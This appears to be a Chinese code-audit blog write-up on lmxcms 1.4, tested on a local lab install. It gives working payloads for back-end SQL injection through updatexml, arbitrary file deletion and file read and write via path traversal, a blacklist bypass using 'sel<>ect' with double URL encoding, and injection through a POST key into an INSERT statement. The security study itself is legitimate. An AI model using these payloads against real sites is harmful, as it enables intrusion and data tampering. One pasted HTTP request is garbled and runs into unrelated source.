目录
(2)BackdbAction.class.php任意文件删除
这里选择的是phpstudy搭建的
源码下载:http://www.lmxcms.com/down/xitong/
下载的是1.4版本,虽然是很早的版本了,但是主要是学习代码审计。
安装一下。
注意这里的php版本不能太高,我用7.3.4版本会报错,改成5.x就可以了
数据库需要提前创建
create DATABASE lmxcms;
数据库用户名密码是你自己的,没改的话基本上都是这个
安装完成。
phpstorm打开源码,
是一个mc架构
1、后台漏洞
(1)BookAction.class.php
打开c\admin\BookAction.class.php,网址对应的就是/admin.php?m=book&a=index
先看这一部分
public function reply(){ $id = $_GET['id'] ? $_GET['id'] : $_POST['id']; //获取回复数据 $reply = $this->bookModel->getReply(array($id)); if($reply){ $reply = string::html_char($reply[0]['content']); $this->smarty->assign('content',$reply); $this->smarty->assign('type','update'); }else{ $this->smarty->assign('type','add'); } if(isset($_POST['reply'])){ if(!$_POST['content']){ rewrite::js_back('回复内容不能为空'); } $this->bookModel->reply(array('id'=>$id,'type'=>$_POST['type'],'username'=>$this->username)); addlog('留言回复【id:'.$_POST['id'].'】'); rewrite::succ('修改成功','?m=Book'); } $this->smarty->assign('id',$id); $this->smarty->display('Book/reply.html'); }
可以看到传入了一个参数,然后调用了getReply函数,跟进一下
public function getReply(array $id){ $id = implode(',',$id); $param['where'] = 'uid in('.$id.')'; return parent::selectModel($param); }
其中implode() 函数返回一个由数组元素组合成的字符串。跟进selectModel函数
protected function selectModel($param=array()){ if($param['field']){ $this->field=$param['field']; } return parent::selectDB($this->tab['0'],$this->field,$param); }
再跟进selectDB函数
protected function selectDB($tab,Array $field,$param=array()){ $arr = array(); $field = implode(',',$field); $force = ''; //强制进入某个索引 if($param['force']) $force = ' force index('.$param['force'].')'; if($param['ignore']) $force = ' ignore index('.$param['ignore'].')'; $sqlStr = $this->where($param); $sql="SELECT $field FROM ".DB_PRE."$tab$force $sqlStr"; $result=$this->query($sql); while(!!$a=mysql_fetch_assoc($result)){ $arr[]=$a; } $this->result($result); return $arr; }
这里我们可以看到他将我们输入的直接拼接到select语句里面了,相当于底层没有进行一个过滤,那么你的所有防御只能靠上层去加,如果有疏漏就会产生漏洞。
这里我们进行一个调试,在sql语句下面加一个echo。
然后我们传一个参数看看
http://192.168.10.128/lmxcms1.4/admin.php?m=book&a=reply&id=1
注意这里要把a的参数值改为reply,即我们最开始的那个函数名
可以看到有回显,我们写一个简单的报错注入
http://192.168.10.128/lmxcms1.4/admin.php?m=book&a=reply&id=1) or updatexml(1,concat(0x7e,version()),1)%23
版本显示出来了。
(2)BackdbAction.class.php任意文件删除
private function delOne($filename){ $dir = ROOT_PATH.'file/back/'.$filename; file::unLink($dir); }
非常简单的一个任意文件删除漏洞,虽然这里的unlink函数自定义的,但是依旧是用来php的unlink函数
public static function unLink($path){ if($path == ROOT_PATH) return; if(is_file($path)){ if(!@unlink($path)) rewrite::js_back('删除文件失败,请检查'.$path.'文件权限'); return true; } }
往上跟,看哪里用了这个delOne函数
public function delbackdb(){ $filename = trim($_GET['filename']); if(!$filename){ rewrite::js_back('备份文件不存在'); } $this->delOne($filename); addlog('删除数据库备份文件'); rewrite::succ('删除成功'); }
在根目录下新建一个1.txt文件
http://localhost/lmxcms1.4/admin.php?m=backdb&a=delbackdb&filename=../../1.txt
访问后文件删除
(3)file.class.php任意文件读(写)漏洞
源码位于class\file.class.php
public static function getcon($path){ if(is_file($path)){ if(!$content = file_get_contents($path)){ rewrite::js_back('请检查【'.$path.'】是否有读取权限'); }else{ return $content; } }else{ rewrite::js_back('请检查【'.$path.'】文件是否存在'); } }
这里自定义了一个getcon函数,里面有file_get_contents函数,并且没有进行过滤,全局搜索一下哪里使用了getcon函数,发现在TemplateAction.class.php里面有使用
public function editfile(){ $dir = $_GET['dir']; //保存修改 if(isset($_POST['settemcontent'])){ if($this->config['template_edit']){ rewrite::js_back('系统设置禁止修改模板文件'); } file::put($this->config['template'].$dir.'/'.$_POST['filename'],string::stripslashes($_POST['temcontent'])); addlog('修改模板文件'.$this->config['template'].$dir); rewrite::succ('修改成功','?m=Template&a=opendir&dir='.$dir); exit(); } $pathinfo = pathinfo($dir); //获取文件内容 $content = string::html_char(file::getcon($this->config['template'].$dir)); $this->smarty->assign('filename',$pathinfo['basename']); $this->smarty->assign('temcontent',$content); $this->smarty->assign('dir',dirname($_GET['dir'])); $this->smarty->display('Template/temedit.html'); }
而且还有一个put函数,跟进后发现是一个写入函数且没有做过滤,所以应该也存在任意文件写入漏洞
public static function put($path,$data){ if(file_put_contents($path,$data) === false) rewrite::js_back('请检查【'.$path.'】是否有读写权限'); }
http://localhost/lmxcms1.4/admin.php?m=template&a=editfile&dir=../index.php
然后是任意文件写入
POST /lmxcms1.4/admin.php?m=template&a=editfile&dir=../ HTTP/1.1Host: 192.168.10.128Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*function p($type=1,$pe=false,$sql=false,$mysql=false){ if($type == 1){ $data = $_POST; }else if($type == 2){ $data = $_GET; }else{ $data = $type; } if($sql) filter_sql($data); if($mysql) mysql_retain($data); foreach($data as $k => $v){ if(is_array($v)){ $newdata[$k] = p($v,$pe,$sql,$mysql); }else{ if($pe){ $newdata[$k] = string::addslashes($v); }else{ $newdata[$k] = trim($v); } } } return $newdata;}
这里提示我们过滤了sql注入,跟进filter_sql函数
//过滤非法提交信息,防止sql注入function filter_sql(array $data){ foreach($data as $v){ if(is_array($v)){ filter_sql($v); }else{ //转换小写 $v = strtolower($v); if(preg_match('/count|create|delete|select|update|use|drop|insert|info|from/',$v)){ rewrite::js_back('【'.$v.'】数据非法'); } } }}
可以看到一个黑名单,不允许使用这些方法,这导致大部分查询都用不了了,那么我们就要从外部绕过p函数,如果从里面绕过这些比较麻烦。
再看p函数下面的delHtml,这个是过滤掉html标签的函数,那么我们就可以传入一个sel<>ect,这样就可以绕过p函数,且在delHtml函数中将<>去掉变成select。
这里我们试一下可不可以
首先跟进getNameData函数,一直跟到底,
protected function oneDB($tab,Array $field,Array $param){ $field = implode(',',$field); $force = ''; //强制进入某个索引 if($param['force']) $force = ' force index('.$param['force'].')'; if($param['ignore']) $force = ' ignore index('.$param['ignore'].')'; $We = $this->where($param); $sql="SELECT ".$field." FROM ".DB_PRE."$tab$force $We limit 1"; echo $sql; $result=$this->query($sql); $data = mysql_fetch_assoc($result); return $data ? $data : array(); }
在这里加个echo $sql;
然后我们用burp suite抓一下包
/lmxcms1.4/index.php?m=Tags&name=a
我们尝试单引号能不能闭合
可以看到被转义了,这是因为p函数的原因,我们再尝试select
看到提示数据非法,那我们试一下sel<>ect
看到成功绕过
之后再看下面有个urldecode,他将我们的语句进行了一次url解码,所以我们可以先将我们的语句进行两次url编码就可以绕过了,因为它本身要进行一次url解码
成功注入,这个就有点像ctf的考点了
(2)BookAction.class.php
进入c\index\BookAction.class.php
public function index(){ if(isset($_POST['setbook'])){//提交留言 $data = $this->checkData(); if($this->bookModel->add($data)){ $this->setBookTime(); //存储提交时间 rewrite::succ($this->l['book_ok']); }else{ rewrite::error($this->l['book_error']); } }
看到一个post传参,然后跟进checkData函数
private function checkData(){ $arr['name'] = ''; $arr['content'] = ''; $arr['mail'] = ''; $arr['tel'] = ''; $arr['ip'] = getip(); //验证短时间内过多留言 if($this->bookModel->is_ip($arr['ip'],$this->config['book_out_time']) >= $this->config['book_out_time_num']){ rewrite::error($this->l['book_outtime']); } $this->bookTime(); //验证提交间隔时间 $data = p(1,1,1); //验证前台数据 $data = array_merge($arr,$data); if(!$data['name']) rewrite::js_back($this->l['book_name_must']); if(!$data['content']) rewrite::js_back($this->l['book_content_must']); //过滤html代码 foreach($data as $k => $v){ $data[$k] = string::delHtml($v); } unset($data['setbook']); return $data; }
一堆参数,然后就是p函数
再看下面的add方法
public function add($data){ $data['time'] = time(); return parent::addModel($data); }
addModel函数就是一个sql查询语句,直接跟到底
protected function addDB($tab,$data){ foreach($data as $key=>$v){ $field[]=$key; $value[]="'$v'"; } $field = implode(',',$field); $value = implode(",",$value); $sql="INSERT INTO ".DB_PRE."$tab($field) VALUES($value)"; echo $sql; $this->query($sql); return mysql_insert_id(); }
依旧在这里把sql语句打印出来,用burp suite传一下
POST /lmxcms1.4/index.php?m=book HTTP/1.1Host: 192.168.10.128Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=fqieraqhgsfnul7hnv8a8t89t0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 39setbook=a&name=b&content=c&mail=d&tel=e
看到这是一个insert语句,但是在checkData函数里面可以知道我们传入的先经过p函数检验,再经过delHtml函数,虽然可以通关尖括号绕过p函数,但是没有办法进行单引号闭合,所以值这里没有办法注入。
但是addDB函数中插入sql语句的有两个地方,一个是field,一个是value,往上看知道data键值对的值被单引号包裹了,而key没有,所以注入点在key
protected function addDB($tab,$data){ foreach($data as $key=>$v){ $field[]=$key; $value[]="'$v'"; } $field = implode(',',$field); $value = implode(",",$value); $sql="INSERT INTO ".DB_PRE."$tab($field) VALUES($value)"; echo $sql; $this->query($sql); return mysql_insert_id(); }
跟到p函数里面也可以看到
function p($type=1,$pe=false,$sql=false,$mysql=false){ if($type == 1){ $data = $_POST; }else if($type == 2){ $data = $_GET; }else{ $data = $type; } if($sql) filter_sql($data); if($mysql) mysql_retain($data); foreach($data as $k => $v){ if(is_array($v)){ $newdata[$k] = p($v,$pe,$sql,$mysql); }else{ if($pe){ $newdata[$k] = string::addslashes($v); }else{ $newdata[$k] = trim($v); } } } return $newdata;}
它只对值进行了过滤并没有对key进行过滤
加入一个键值对进行注入
setbook=a&name=b&content=c&mail=d&tel=e&time)values(1,2,3,4,5,6)#=f
看到没有报错,是注入成功的,但是怎么有回显呢?(其实这里也可以用报错注入)
将db.class.php里面的echo $sql;全部注释掉,访问
http://localhost/lmxcms1.4/index.php?m=book
如果不注释会导致页面不正常
发现有内容,但是我们注入的并没有出现,直接去MySQL里查
发现我们之前的内容在里面,知道确实注入成功了,然后还看到一个ischeck,之前在页面中回显出来的ischeck值都为1,所以我们也可以加一个ischeck
setbook=a&name=b&content=c&mail=d&tel=e&time,ischeck)values(1,database(),3,4,5,6,1)#=f
然后刷新页面
来源地址:https://blog.csdn.net/m0_60716947/article/details/128576895